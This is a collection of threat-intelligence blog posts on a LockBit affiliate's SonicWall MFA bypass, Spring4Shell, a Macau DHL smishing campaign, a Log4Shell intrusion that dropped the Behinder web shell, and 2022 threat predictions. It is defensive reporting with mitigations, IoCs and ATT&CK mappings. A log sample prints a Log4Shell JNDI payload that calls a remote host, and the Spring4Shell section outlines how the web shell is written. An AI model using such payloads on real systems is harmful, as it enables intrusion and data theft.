Lockbit 2.0 affiliate’s new SonicWall exploit bypasses MFA

Increasing Capabilities of LockBit 2.0 Gang Per Our Incident Response Experience in Q1 2022 Impacts Over One Hundred Hong Kong and Macau Organisations; Exploit Acknowledged by SonicWall as CVE-2022-22279

In the first quarter of 2022, DarkLab responded to several ransomware incidents impacting organisations in the financial services, real estate, and manufacturing sectors across Hong Kong, China and Asia Pacific. In all such incidents, the presence of the LockBit executable file, .lockbit extension files, and the StealBit malware suggests that affiliates of the cybercriminal group that operates the LockBit 2.0 Ransomware-as-a-Service (RaaS) was likely behind the incidents.

LockBit 2.0 RaaS is a well-documented group with established tactics, techniques and procedures (TTPs) that has been active since 2019.[1] During our incident response investigations, we found LockBit affiliates exploiting two victims’ SonicWall Secure Remote Access (SRA) Secure Sockets Layer Virtual Private Network (SSLVPN) appliance to establish a foothold in their networks. In the first instance, the affiliate exploited a known SQL injection (SQLi) vulnerability to obtain valid usernames and passwords. Given the multi-factor authentication (MFA) access control was not enabled, they were able to achieve initial access relatively easily. In the second instance, the affiliate performed follow-up actions to retrieve the time-based one-time password (TOTP) which enabled the circumvention of the MFA access control.

In this blog post we will report on their novel technique to exploit SonicWall SSLVPN appliances and bypass MFA. According to results from open source internet search engines, over one hundred Hong Kong and Macau organisations may be susceptible to this exploit based on their reported use of potentially vulnerable appliances. This exploit disclosed by DarkLab has since been acknowledged by SonicWall as CVE-2022-22279.

A second blog post will then outline the LockBit affiliates’ TTPs as observed in our incident response experience. The final blog post will explore the potential factors that enables the LockBit RaaS group to continue innovating at a rapid pace and cement their position as a major player in the ransomware threat landscape.

Initial Access

The typical modus operandi of LockBit 2.0 affiliates is to gain access to a victim network by exploiting known vulnerabilities of public-facing services, including vulnerable SSLVPN. In particular, CVE-2018-13379 [2] has been the preferred vulnerability in many incidents, including those DarkLab responded to in January and February 2022. The vulnerability is several years old, and LockBit 2.0 affiliates were still able to capitalise on the exploit that allows for unauthenticated users to download system files through crafted HTTP resources requests. Other affiliates have been reported to gain initial access by conducting Remote Desktop Protocol (RDP) brute forcing[3] or through purchasing access to compromised servers via underground markets.[4]

However, in two incidents that DarkLab responded to in March 2022 we observed a new infection vector.  Affiliates were observed to exploit a known but relatively obscure SQLi vulnerability – either CVE-2019-7481 [5] or CVE-2021-20028 [6] – in a novel manner to retrieve user session data stored in the SonicWall SSLVPN appliance to the affiliate’s local endpoint. Retrieved data included valid usernames, passwords, and the TOTP. In doing so, the affiliates could circumvent the MFA access control, impersonate any user to gain initial access, and subsequently deploy ransomware.

Figure 1 – LockBit’s initial attack chain

The latter incidents we responded to in March 2022 were noteworthy for two reasons. First, LockBit affiliates were not reported to have exploited SonicWall SSLVPN products in the past. Second, this was the first publicly observed instance that the known SQLi vulnerability could be exploited by threat actors to extract the TOTP SHA-1 tokens of onboarded users. Affiliates could then generate the QR code containing the required information to generate one time passwords (OTP) in an authenticator app of their choice.[7] This proved to be an innovative way to circumvent the existing MFA access controls. The observation of the exploitation suggests the affiliates of LockBit now have additional tools in their arsenal, and indicates the importance they place in continuous improvement as the group looks to differentiate itself from competitors.

Impact to Hong Kong and Macau

DarkLab replicated and verified the novel exploitation method of the post-authentication vulnerability through internal testing of several known impacted SonicWall SSLVPN firmware. We have shared all relevant details, including the technical exploit code, with the SonicWall Product Security Incident Response Team (PSIRT) in March 2022 to ensure organisations are protected. We will not publicly disclose exact exploitation details to avoid replication by malicious actors.

Per subsequent communications with SonicWall PSIRT, we understood that the upgrades to SonicWall SMA firmware or above, and or above in February 2021 to address CVE-2021-20016 included comprehensive code-strengthening that proactively prevented malicious attackers from exploiting this vulnerability to circumvent the MFA access control.[8] On 12 April 2022, SonicWall PSIRT released the following advisory acknowledging the vulnerability CVE-2022-22279 which we had disclosed.[9]

As of the time of writing, we have not observed from our deep and dark web monitoring any specific intentions by threat actors to leverage this post-authentication vulnerability to target organisations in Hong Kong and Macau. However, we observed that Russian-speaking threat actors had been discussing this vulnerability in early February 2022, with posts from two underground forums – exploit[.]in and xss.[.]is – containing conversation details of purchasing the exploit code and outlining at a high-level the follow-up actions that can be taken to extract the TOTP from the active sessionid

Figure 2 – Screenshot of exploit[.]in underground forum
Figure 3 – Screenshot of xss[.]is underground forum

As a result of the LockBit incidents and various hacker chatter, we were concerned that local organisations may have missed SonicWall PSIRT’s advisory note; after all, we still observed compromises that resulted from the exploitation of CVE-2018-13379 on unpatched Fortinet SSLVPN appliances in February 2022. To that end, we conducted a passive, non-intrusive scan of both CVE-2019-7481 or CVE-2021-20028 on the full Internet Protocol address (IP address) range of Hong Kong and Macau. The preliminary results indicated that at least 100 organisations were vulnerable to CVE-2021-20028, with half of those also vulnerable to CVE-2019-7481.

DarkLab has since proactively contacted dozens of potentially affected organisations to alert them of the potential risks they faced. However, given there were a series of critical vulnerabilities pertaining to SonicWall SSLVPN appliances released in June 2021, it is likely that those may be exploited through other innovative methods by threat actors. For example, the Cybersecurity & Infrastructure Security Agency (CISA) listed CVE-2021-20016 as another SQLi vulnerability that allows a remote unauthenticated attacker to perform SQL query to access username password and other session related information in SMA100 build version 10.x. [10], which aligned with our communication with SonicWall’s PSIRT. We foresee that if left unpatched, this could pose a threat that adversaries may exploit to gain unauthorised access through exploitation of this vulnerability.

CVE NumberProductVulnerability NameDate Added to CatalogueShort Description
CVE-2021-20021SonicWall Email SecurityPrivilege Escalation Exploit Chain3 November 2021A vulnerability in version 10.0.9.x allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host.
CVE-2021-20022SonicWall Email SecurityPrivilege Escalation Exploit Chain3 November 2021A vulnerability in version 10.0.9.x allows a post-authenticated attacker to upload an arbitrary file to the remote host.
CVE-2021-20023SonicWall Email SecurityPrivilege Escalation Exploit Chain3 November 2021A vulnerability in version 10.0.9.x allows a post-authenticated attacker to read an arbitrary file on the remote host.
CVE-2021-20016SonicWall SSLVPN SMA100SQL Injection Vulnerability3 November 2021A vulnerability in SMA100 build version 10.x allows a remote unauthenticated attacker to perform SQL query to access username, password and other session related information.
CVE-2021-20018SMA 100 AppliancesStack-Based Buffer Overflow Vulnerability28 January 2022SonicWall SMA 100 devices are vulnerable to an unauthenticated stack-based buffer overflow vulnerability where exploitation can result in code execution.
CVE-2021-20028SonicWall SRASQL Injection Vulnerability28 March 2022SRA products contain an improper neutralisation of a SQL Command leading to SQL injection.
Table 1 – CISA known exploited vulnerabilities catalogue listing various critical SonicWall CVEs that were being exploited in the wild as of 2 April 2022

The ongoing evolution of TTPs allowed LockBit’s affiliates to become the most prolific ransomware actors in 2022. Between 1 January and 31 March 2022, the group claimed 223 victims on their dark web leak site, compared to Conti’s 125. This equates to more than one-third of all known ransomware incidents for Q1 2022. To put it in another way, over the same period LockBit’s affiliates claimed almost 10 percent more victims than the other 24 known ransomware groups combined (223 compared to 164). LockBit’s reported activities have also increased over the course of the first three months of 2022. The gang claimed 112 victims in March, while it published details of 111 companies in the previous two months combined. This suggest an ongoing trend highlighting how LockBit will likely remain the most active ransomware-as-a-service offering for the coming months.

Figure 4 – Number of victims published on ransomware dark web leak sites between 1 January 2022 and 31 March 2022


Lockbit 2.0 affiliates work on behalf of the Lockbit group to conduct ransomware campaigns against organisations and industries across the globe. The affiliates’ abilities to conduct the intrusion and execution of Lockbit 2.0 ransomware vary, and through these incidents we observed affiliates with a diversified capability and skillset exploit a known SQLi vulnerability in a novel way to circumvent the MFA access control and obtain initial access. At least 100 organisations in Hong Kong and Macau are at potential immediate risk, and we foresee that if left unpatched, this could pose a threat that adversaries may exploit to gain unauthorised access through exploitation of this vulnerability. We will continue to monitor the situation and assist organisations as needed. In the next blog post, we will also share further details on the TTPs leveraged by LockBit affiliates as a result of our recent incident response experience with reference to the MITRE ATT&CK Framework, such that organisations can better prevent and detect malicious activities related to this RaaS group.


For organisations that have deployed the vulnerable versions of SonicWall SRA SSLVPN, we recommend the following actions immediately in the following order:

  • Upgrade legacy SRA SSLVPN device(s) running firmware 8.x given they are not supported by SonicWall; apply patches to the impacted versions of the 9.x or 10.x firmware.
  • Reset all user account Active Directory credentials that had previously authenticated via the SonicWall SRA SSLVPN. In particular, the Active Directory credentials that is tied to the SonicWall SRA device for authentication purpose should be changed.
  • Re-bind users’ second authentication factor (e.g., Google or Microsoft Authenticator) app with an updated TOTP, and ensure that users store their newly generated backup codes securely.[11]
  • Review the privileges granted to the Active Directory account tied to the SonicWall SRA device for user authentication purpose, and remove excess permissions where possible to adhere to the principle of least privilege. In general, Domain Administrator privilege should not be used.
  • Perform a review of access management with respect to identity and network access (e.g., removal of legacy and unused accounts, housekeeping of privileges for all accounts, and enforce network segmentation to tighten access to key servers).

Meanwhile, defending against undisclosed exploits are extremely challenging, but not impossible if organisations adopt a defense-in-depth approach. The following guiding principles should be observed:

  • Require multi-factor authentication for all services to the extent possible, especially on external remote services. 
  • Implement a robust threat and vulnerability management programme that leverages cyber threat intelligence to achieve a resilient security posture. Specifically:
    • Maintain regular cybersecurity patching hygiene practices, including a robust baseline that patched known exploited vulnerabilities and aims to reduce known attack surface. 
    • Leverage cyber threat intelligence to prioritise the remediation scale and timeline on a risk-based approach, through the incorporation of indications and warnings regarding trending threats per available proof-of-concept code, active exploitation by threat actors, and Darknet chatter.
  • Maintain “tertiary” offline backups (i.e., tertiary backup) that are encrypted and immutable (i.e., cannot be altered or deleted). This should be atop of your existing secondary data backups that should adopt security best practices, in particular network segmentation with your production and/or primary site.
  • Develop and regularly test the business continuity plan, ensuring that the entire backup, restoration and recovery lifecycle is drilled to ensure the organisation’s operations are not severely interrupted.


We include the observed MITRE ATT&CK tactics and techniques elaborated from part one of the blogpost. We will expand this list as we deep-dive into the affiliates’ TTPs as observed from our incident response experience in Q1 2022.

  • Initial Access: Exploit Public-Facing Application (T1190)
  • Initial Access: Valid Accounts (T1078)
  • Impact: Data Encrypted for Impact (T1486)

Indicators of Compromise (IoCs)

We include the observed IoCs elaborated from part one of the blogpost. We will expand this list as we deep-dive into the affiliates’ TTPs as observed from our incident response experience in Q1 2022.

LockBit_9C11F98C309ECD01.exeExecutable File
.lockbitEncrypted Files Extension
91.219.212[.]214IPv4 Address
5.206.224[.]246IPv4 Address
51.91.221[.]111IPv4 Address
213.186.33[.]5IPv4 Address
194.195.91[.]29IPv4 Address

Feel free to contact us at [threatintel at darklab dot hk] for any further information.

Thousands of organisations in Hong Kong and Macau impacted by Spring Core Remote Code Execution Vulnerability

Impacted organisations include financial services and critical infrastructure providers

On 29 March 2022, security researchers posted a now-removed screenshot to Twitter purporting to show a trivially-exploited unauthenticated remote code execution (RCE) vulnerability in the Spring Framework, one of the most popular Java frameworks in use globally.[1] While the screenshot did not include a proof of concept or public details, Proof of Concepts dubbed “SpringShell” or “Spring4Shell” have since emerged since 30 March 2022 and have been validated by DarkLab to be working exploits.[2]

The Spring Framework is among the most widely used lightweight open source framework for Java, as a result of its design philosophy that enables developers to focus on business logic, while simplifying the development cycle of Java enterprise applications.[3] Given its widespread use globally, the nature of the vulnerability being more general such that there may be unknown and additional ways of exploiting it, the impact of this vulnerability is compounded significantly and would be in excess of the impact observed for infamous vulnerabilities such as Log4Shell (CVE-2021-44228).

Technical Analysis

Based on analysis on consolidated data source and technical analysis, DarkLab has been able to recreate the attack in a simulated environment. In order to exploit this vulnerability, an unauthenticated attacker must send a crafted HTTP request to trigger the mechanisms through parameter binding functions of the framework to achieve arbitrary file write, with calls to specific Java ‘classLoader’/’pipeline’ functions. It is likely that the Spring Framework does not handle these calls properly, allowing for arbitrary writing of the JSP web shell to the root directory of the server, which can then be interacted with for unauthenticated remote code execution.

Figure 1 – redacted screenshot of successful simulated exploitation of RCE vulnerability that landed us a JSP web shell at the backend server

DarkLab has been actively performing discovery using our proprietary PoC since 30 March 2022.  As a result of conducting the scan across all external facing applications in Hong Kong and Macau, we observed that over thousands of organisations – including financial services and critical infrastructure providers – are potentially vulnerable to the unauthenticated RCE vulnerability. At the time of writing, the scope of impacted organisations and the broader implications of exploitation are still being estimated and not fully known, as it depends on whether particular functions are used within the Spring application.[4] The general nature of the vulnerability implies there may be other still undiscovered methods to exploit it.

Probability of Exploitation by Threat Actors

Given that this is an unauthenticated RCE vulnerability in the widely-adopted Spring Framework, it is likely that it will present an attractive exploit for a variety of threat actors to weaponize and add to their arsenal for the purpose of obtaining initial access to unsuspecting victims’ systems.

Per DarkLab’s Deep and Dark Web monitoring, we observed on 29 March 2022 that English-speaking threat actors had exchanged messages via Telegram requesting for a working exploit code. While we are unable to ascertain with confidence whether they obtained this information through communication exchange, we observed clear intent from these threat actors to leverage the unauthenticated RCE vulnerability to perform malicious activities against a specific range of targets. This includes exfiltrating sensitive personally identifiable information from South Asian state-owned enterprises, which suggests that these threat actors have a more targeted mindset and are capable of directing their attention to the observed vulnerable organisations in Hong Kong and Macau should it align with their objectives.

While there has not been active exploitation in the wild for Spring4Shell, we posit that threat actors of various objectives – ranging from espionage to financial motivation – will continue to invest resources to explore how best to weaponise the vulnerability to achieve their goals. DarkLab will continue to monitor the Deep and Dark Web for more insights on their innovations and targeting and provide updates as necessary.


In summary, this unauthenticated RCE vulnerability in the widely-adopted Spring Core makes it an attractive proposition for threat actors of all profiles and motivations. In particular, the general nature of the vulnerability implies there may be other ways to exploit it. As a result, we expect threat actors of all motivations will invest resources to innovate new techniques; until then, detection opportunities will remain limited. This implies that teams should first rely on their defense-in-depth security controls to mitigate the known risks, while continuing to track the status of this vulnerability regarding preventive and detective controls as they become publicly available.


Organisations using affected versions 5.3.x should upgrade to 5.3.18+, while versions 5.2.x should upgrade to 5.2.20+. However, there are other workaround solutions for applications that cannot upgrade to the above versions as listed on the Spring blog post.[5]

From a detection perspective, exploitation attempts will require HTTP requests making use of Java classes. As such, filtering for strings such as “class.“, “Class.“, “.class.“, and “.Class.” may detect exploitation attempts.

In addition, we strongly urge our clients to consider the following:

  • Review their application stack to ascertain the scope of impact in preparation for the impending patch to be released.
  • Monitor the official Spring vulnerability report [6] or Git repository for further updates to the patch releases and apply accordingly.[7]
  • Leverage cyber threat intelligence to monitor for further updates to the threat landscape as a result of new information pertaining to the unauthenticated RCE vulnerability.


  • Initial Access: Exploit Public-Facing Application (T1190)
  • Execution: Exploitation for Client Execution (T1203)
  • Persistence: Server Software Component – Web Shell (T1505.003)
  • Command and Control: Application Layer Protocol – Web Protocols (T1071.001)

Feel free to contact us at [threatintel at darklab dot hk] for any further information.

Smells SMiShy to me…

Macau SMS Phishing Unveils Threat Actor Close to Home

On 2 March 2022, Darklab observed SMS phishing (smishing) activity targeting mobile users in Macau. The message masqueraded as the courier service DHL delivering a package to the victim. The intended purpose was to steal victims’ credentials, personally identifiable information (PII), and credit card details.

Smishing campaigns via the fraudulent use of the DHL brand is far from uncommon.[1] Indeed, the Macau Polícia Judiciária issued a notice on 24 February 2022 to warn citizens about fraudsters masquerading as counterfeit courier companies to trick victims into providing their personal information.[2]

However, we were interested in this case as the threat actor behind it had also registered several fake domains masquerading as other reputable companies in Hong Kong and Singapore, such as Hongkong Post and Singapore Post. While we are used to phishing and smishing campaigns globally, when this happens in our virtual backyard it draws our attention as it can pose a real threat to users in Hong Kong, Macau, and Singapore.

Smishing Incident in Macau

The initial malicious SMS message came from a sender named INFO. Recipients are requested to click the provided hyperlink to reschedule the package pick-up date and time as the previous attempt was not delivered successfully.

Figure 1 – Initial SMS phishing message sent to the victim
Figure 2 – Image displaying the fraudulent delivery status

Once the victim has opened the link, a page appearing to be the Hong Kong DHL Express displays a phony delivery schedule page with free text fields that the recipient is supposed to complete to schedule a delivery time. Information requested includes user’s full name, contact number, residential address, city, and postal code.

Figure 3 – image of the phony page requesting the victim into inputting their credentials

After inputting the personal information and clicking the submit button, the victim is redirected to another page that requires them to select their preferred delivery option.

Figure 4 – fraudulent DHL HK page asking victims to proceed to the payment card page

Upon selecting the preferred delivery option, the fraudulent DHL HK site requests for the victim to input financial information, including name, credit card number, expiration date, and CVV number. Once in possession of users’ payment card details, criminals can resell them online or conduct financial fraud themselves.

Figure 5 – Final page designed to capture the victims’ credit card details

Something Smelt Smishy…

The risk of smishing has increased at an alarming rate as a result of the Covid-19 pandemic. While this is not entirely a new trend, we observed that the messages are becoming increasingly deceptive as they look to trick victims into providing their personal information.

What threw us off was the fact that the URL within the smishing text redirected users to the URL hongkong-post[.]net/918srx, which was a Russian IP address – 31[.]28[.]27[.]151 – hosting the fake DHL site. The same IP address also hosted the domain dhl-post[.]hk.  Both malicious domains and their associated SSL certificates were created after 28 February 2022, just a few days before the beginning of the smishing campaign.

Additionally, hongkong-post[.]net had mail exchanger (MX) records, which suggested the threat actors’ intent to send and/or receive emails.[3] We also saw MX records for another domain, singapore-post[.]com, hosted on the same IP address and created on 7 March 2022. Overall, the existence of young domains with MX records mimicking legitimate brands is a strong indication of likely phishing intent, which security teams should be monitoring for.

The historical WHOIS lookup for the domains revealed that the registrar company is NiceNIC INTERNATIONAL GROUP CO., LIMITED (NiceNIC.NET) based in Hong Kong.[4] While pivoting through the Registrar Name and NiceNIC.NET’s Chinese company name “耐思尼克國際集團有限公司”, we observed 21 additional domains associated with this registrar as of 8 March 2022. At least four of the domains (xjam[.]hk, canadahq[.]hk, kaddafi[.]hk, and aij[.]hk) were flagged by security scanners as likely malicious. Furthermore, there were newly registered domains (aididas[.]com[.]hk) that were not yet flagged by security scanners, though strongly looked like a fraudulent website.

Meanwhile, we also observed that canadahq[.]hk had relation resolutions to a known bad Russian IP address 185[.]178[.]208[.]186, which hosted files to download the Trojan “Win32.Trojan.Raasj.Auto”. This Trojan was first observed in 2017 per various open source threat exchange platforms[5], and there are various web posts elaborating the various impacts to the victim.

In one instance, the Trojan is elaborated to have performed as the spyware that steals sensitive information such as credit card details and passwords for sale and profitability.[6] On the other hand, the Trojan was deemed to have been altered and linked to the “Trojan-Ransom.Win32.Shade.Ino” ransomware that cybercriminals deliver via phishing emails to conduct online frauds. The ransomware ciphers documents on the hard drive and prevents normal access to the victim’s workstation, with a ransom note locatable on the local drive upon reboot that demands payment to decipher the data.[7] A third web post noted that the “Win32.Trojan.Raasj.Auto” Trojan would hijack victims’ web browser to cause web redirection issues, and slow down the overall System and Network performance speed.[8]

Overall, the links to relatively low level malware suggests a financially motivated campaign spanning multiple years and only recently focusing on Hong Kong and South East Asian targets.

Figure 6 – Pivoting out from 耐思尼克國際集團有限公司 to identify further known-bad malicious domains and IP addresses, along with the Trojan “Win32.Trojan.Raasj.Auto


Through a Macau smishing campaign, we were able to uncover a wider campaign targeting Hong Kong, Macau, and Singapore and involving a network of malicious Hong Kong domains registered by the same local registrar. A specific domain had a resolution history to a Russia-based IP address reportedly linked to Trojans used since at least 2017, suggesting it was likely rented by or associated with multiple cybercriminal threat actors. Our assessment is reinforced by the fact that the original domain exploited for smishing, dhl-post[.]hk, was hosted by a Russian server, which is a relatively rare occurrence in Hong Kong.


While phishing and smishing abusing legitimate brands will remain a problem, companies can take action to mitigate and prevent the threat they pose.

  • Organisations should update their email security solution and network devices (including external firewall, web proxies) to detect for potential inbound/outbound connections from the known-bad domains and IP addresses in this post.
  • Users should remain wary of the legitimacy of webpages and their branding, and access websites via the global webpage as opposed to the URL shortened link if in doubt. Impacted companies should issue circulars and alerts as necessary when impersonation attempts are detected.
  • Organisations should conduct young domains monitoring and alert against potentially suspicious domains for further action. This task is typically conducted by our Security Operations Centre for subscription clients. We have already informed both DHL and Hongkong Post to investigate, and if necessary perform takedown of fake domains dhl-post[.]hk and hongkong-post[.]net.
  • Registrars should enhance their onboarding due diligence to reduce the risk of provisioning of domains impersonating legitimate brands, and should regularly reviews activities of those domains to ensure their use for ethical and non-malicious activities.


  • Initial Access: Phishing (T1566)
  • Initial Access: Phishing: Spearphishing Link (T1566.001)
  • Execution: User Execution (T1204)
  • Credential Access: Input Capture – Web Portal Capture (T1056.003)
  • Collection: Input Capture (T1056)
  • Collection: Browser Session Hijacking (T1185)
  • Exfiltration: Automated Exfiltration (T1020)
  • Impact: Data Encrypted for Impact (T1486)
  • Impact: Account Access Removal (T1531)
  • Impact: Endpoint Denial of Service (T1499)

Indicators of Compromise (IOCs)

• hxxps://hongkong-post[.]net/e/authID=UEjJc/tracking.php?sessionid=4g3ihd1ej09+6b+27fc58arSZF+27+5p9Ba8+D6Y+Gg3ok+4+1uIEOgCLfMSPmNKwbHwTAaX+J42951997505
• dhl-post[.]hk
• hongkong-post[.]net
• singapore-post[.]com
• xjam[.]hk
• canadahq[.]hk
• kaddafi[.]hk
• aij[.]hk
• aididas[.]com[.]hk
• 31[.]28[.]27[.]151
• 185[.]178[.]208[.]186

Feel free to contact us at [threatintel at darklab dot hk] for any further information.

A look Behinder the scene

Popular web shell exploited after Log4Shell for data theft

DarkLab recently responded to an incident affecting a Hong Kong organisation in the retail sector. Threat actors exploited the vulnerability CVE-2021-44228 in the Apache Log4j library, also known as Log4Shell, as initial infection vector (link). While we observed multiple attempted exploitation of Log4Shell against our Managed Security Service clients since its initial reveal on 10 December 2021, this was the first instance where we observed Log4Shell exploited in a prolonged network intrusion whose aim was not the typical crypto-mining or ransomware deployment for financial gain.

After initial access via Log4Shell, the actor dropped the Behinder web shell on the victim’s public-facing web servers. They exploited this access sporadically over a period of 51 days to retrieve additional information from backend database servers, which led to an increase in network activity and their subsequent discovery.

Initial access and web shell deployment  

Log4Shell is a software vulnerability in the Apache Log4j 2, a popular Java library to extend logging capabilities in applications. The vulnerability enables a remote attacker to gain the ability to execute arbitrary code and take control of a device running vulnerable versions of Apache Log4j 2.

In this instance, we observed that the adversary performed manual probing to identify an entry point in the login page of a victim’s public-facing web server. The adversary spent several hours repeatedly interacting with the vulnerable webpage. Such prolonged interaction with the identified target suggest attackers were not just running automated scripts like we have seen many opportunistic threat actors do, but rather had a degree of interest in compromising this victim.

# Entry in Nginx
x.x.x.x – – [1/Jan/2022:08:00:00 +0000] “POST /login/logincheck HTTP/1.1” 302 0 “[https:]

//www.victim.com/victim/login” “Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36” “x.x.x.x”
# Corresponding entry in Apache Log4j log
INFO | jvm 1 | main | 2022/01/01 08:00:00.130 | org.app.victim.UnhandledException: Invalid id ‘${jndi:rmi://x.x.x.x:1099/oHg5SJ}’
INFO | jvm 1 | main | 2022/01/01 08:00:00.433 | org.app.victim.UnhandledException: Invalid id ‘${jndi:rmi://x.x.x.x:1099/oHg5SJ}’

Fig 1 – log sample showing threat actors’ exploitation attempt. The sample has been sanitised to maintain the victim’s anonymity.

Once successfully exploited Log4Shell, they dropped the Behinder web shell (or “冰蝎”). Behinder is a versatile, multi-platform web shell created by a Chinese-speaking developer and popular within the hacking community in the same country (link). This web shell allows for AES-encrypted command and control (C2) traffic (link), which helped the threat actor maintain stealth and persistence in their victim’s environment.

Fig 2 – example of Behinder web shell’s user interface, likely used by the attacker to interact with the victim’s environment

The threat actor then performed enumeration of the internal system with the web shell and obtained the application credentials to access the backend application database. In this database the threat actor issued search queries via the web shell. These used terms revealing their interest in customer data such as customers’ names, email addresses and residential addresses. At this point, limited log availability did not allow us to determine the amount and nature of data accessed and exfiltrated.

Intruders interacted with the compromised servers via throwaway infrastructure. They used Vultr Virtual Private Servers (VPS) hosted in South Korea for several consecutive days, followed by VPS hosted in Japan in the subsequent network spikes. Adversaries typically rent VPS from service providers such as Vultr to host their C2 servers while masking the origin of their source IP addresses, thereby preventing security researchers to easily trace and link their infrastructure with previously known intrusions.

Who is Behinder the intrusion?  

We do not have enough evidence to confidently attribute the intrusion to a known threat actor group. The large amount of customers’ personally identifiable information the victim held was of likely interest to financially and politically-motivated threat actors alike.

However, the use the Behinder web shell strongly suggests a Chinese-speaking threat actor. We also noticed how a recent open source paper (link) on the Earth Lusca group describes the actor as using Vultr VPS infrastructure and dropping Behinder, which match our observed activity. Notably, Earth Lusca has also previously targeted Hong Kong organisations. However, this allegedly state-sponsored group routinely exploits malware like Winnti and Cobalt Strike which we have not seen in this incident. This, and the relatively generic TTPs observed, hinders any confident attribution assessment.


  • Echoing our 2022 predictions advice, organisations should profile their attack surface to understand services open, technologies used, and known vulnerabilities. Patching programmes should enable a threat-based prioritisation of missing security patches and facilitate rapid deployment of critical security patches within aggressive timeframes.
  • Build a robust enterprise security architecture with layered defense to address potential security risks to critical assets (i.e., data, infrastructure, applications).
  • Enable security audit logs to ensure maximum visibility on existing security monitoring. In particular, ensure that logs’ retention period is sufficient to support after-the-fact investigations of potential incidents.
  • Implement specific mitigations against Log4Shell and related Log4j-related vulnerabilities including blocking specific outbound Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) network traffic


  • Reconnaissance: Active Scanning (T1595)
  • Initial Access: Exploit Public-Facing Application (T1190)
  • Persistence: Server Software Component – Web Shell (T1505.003)
  • Discovery: File and Directory Discovery (T1083)
  • Discovery: Network Service Scanning (T1046)
  • Collection: Data from Local System (T1005)
  • Command and Control: Application Layer Protocol – Web Protocols (T1071.001)
  • Command and Control: Encrypted Channel – Symmetric Cryptography (T1573.001)
  • Exfiltration: Exfiltration Over C2 Channel (T1041)

Indicators of Compromise (IOCs)

Feel free to contact us at [threatintel at darklab dot hk] for the full set of Indicators of Compromise (IOCs).

What to expect in 2022

We do not have a crystal ball to predict the future. However, we have plenty of experience in researching, responding, and mitigating cyber threats for our clients. The last eighteen months saw a dramatic evolution of the cyber security challenges companies face. Based on what we are observing in the threat landscape and the conversations we are having with industry leaders across sectors, here we outline what DarkLab cyber threat analysts assess will be some of the most relevant issues in 2022. 

Ransomware profits will ensure ongoing exploitation by lesser-known gangs 

Human operated ransomware with a double extortion tactic exploded in 2020, kept growing in 2021, and we expect it to continue to pose a high threat to organisations in 2022. Our analysis of ransomware groups’ posts on the darkweb show no sign of the underground industry slowing down.  

What we expect to change is criminals’ branding tactics. Well known ransomware-as-a-service outfits like BlackMatter and REvil exploited their fame to attract affiliates and threaten victims into meeting their ransom demands. However, their high profile attracted law enforcement attention, including in their domestic countries like Russia, and has led to these groups’ downfall. A logical reaction will likely see cybercriminals avoiding the same mistakes and maintaining a lower profile. Expect a larger number of smaller ransomware gangs in 2022. 

Increased threat to cryptocurrency businesses  

While extortion has been the main profitable enterprise for cybercriminals in 2021, the profits will likely be reinvested in diversifying operations. Sophisticated groups like APT38 and individual hackers have in 2021 shown the potential profitability of targeting cryptocurrency exchanges and start-ups. Laundering millions of dollars worth of cryptocurrency is, for now at least, easier for criminals than to move large sums across the traditional financial system.  

As more and larger companies join the cryptocurrency business, and regulators still lag behind in imposing strict anti-fraud controls, there is a likely window of opportunity for criminals to exploit.  

Increased emphasis on private sector players in espionage operations 

Security researchers have warned of the threat posed by private sector spyware providers for a long time, although governments have only recently acted on it and imposed sanctions on some of the best known companies in the field. Israeli companies like NSO and Candiru are the highest profile names in a crowded industry providing many shades of services, from legitimate offensive toolsets to hack-for-hire operations, particularly in South and South East Asia.  

Even though governments worldwide have allegedly used private sector contractors in part of their offensive operations’ supply chain, last year’s increased media and government interest has put a spotlight on the issue. We expect more such campaigns to be highlighted in 2022.

Cloud supply chain is a potential single point of failure 

This prediction is, we truly hope, one that is not going to happen in the coming year, but rather a wider concern based on the dynamics we are observing in the IT industry and the cyber  threat landscape.  

Companies have moved to the cloud at an unprecedented speed during the last two years, and we are not seeing any deceleration on the horizon. However, increased data crunching in the cloud is not always met with a proportional increase in cloud security spending, best practices for which are still in their relative infancy.  

The number of trusted cloud vendors are also limited, with a few very large companies hosting most of the world’s data. Granted, companies like Microsoft, Amazon, Tencent and Alibaba have very good security teams and large security budgets. However, they also represent obvious central systems linked to many large organisations of interest to threat actors. Cloud systems’ outages, like those affecting a major US-based provider in December 2021, demonstrated the potential impact an attack on these companies could have on their customers.  

The mass and rapid exploitation of MS Exchange, ProxyShell and Log4shell also showed how adept threat actors are at weaponising vulnerabilities in widely used digital systems, and how these campaigns can paralyse security teams worldwide for weeks.  

Finally, the most sophisticated among threat actors, like APT29/Nobellium, have already demonstrated their intent and capability to successfully exploit cloud supply chain to gain access to high profile targets. Our experience suggests that where sophisticated state-sponsored threat actors go, criminals eventually follow.  

As such, the exploitation of cloud supply chain is likely among the highest threats to organisations in 2022 and beyond. Fortunately, much can be done to mitigate this threat by careful planning, including thorough application of zero-trust architecture and a shift-left approach to cloud devsecops. 

Recommendations to secure your 2022

We do not expect the challenges facing cyber security professionals in the coming year to be less ominous that those we just put behind us. Nonetheless, 2021 taught us plenty of useful lessons that can equip companies with the right strategies and tools to successfully mitigate cyber threats we may face in 2022.  

  • Comprehensive intrusion defense strategy: Our incident response and threat hunting experience suggests that a few best practices go a long way to prevent most  network intrusions:  
    1. Attack surface hardening: enterprises should focus on profiling their attack surface including services open and technologies used, and reducing their internet-exposed infrastructure.  
    2. Identifying and protecting critical internal systems: threat actors, especially ransomware operators, actively look for systems in their victims’ network that serves crucial functions and holds sensitive data  (e.g. Domain Controllers, backup servers, file servers). Securing these systems would reduce the impact of an intrusion and increase likelihood of detection, while increasing costs for attackers. 
    3. Defending against lateral movement: the majority of threat actors moving across network rely on mechanisms that are relatively easy to disrupt with security restrictions such as restriction of remote desktop protocol between user zones, and disabling Windows Remote Management, among others. 
    4. Protecting user accounts and privileged access: good credentials protection and management are key measures in limiting credential theft and abuse. Security measures should include multifactor authentication for remote access or sensitive access, house-keeping of user and system accounts, credentials hardening for privileged accounts by using managed service accounts (MSA) and protected user group.  
  • Risk-based security controls help overcome limitations: budget and human resources are finite resources. Prioritising them in the most efficient way is crucial to a timely and effective security strategy. Companies should understand intent and capabilities of the most likely threats they face. Assessing the likelihood of threats to a critical systems and their potential impact is what makes a risk-based approach to security effective. By understanding the most likely TTPs threat actors will use against your most important systems, companies can prioritise the application of the most urgent security controls.  
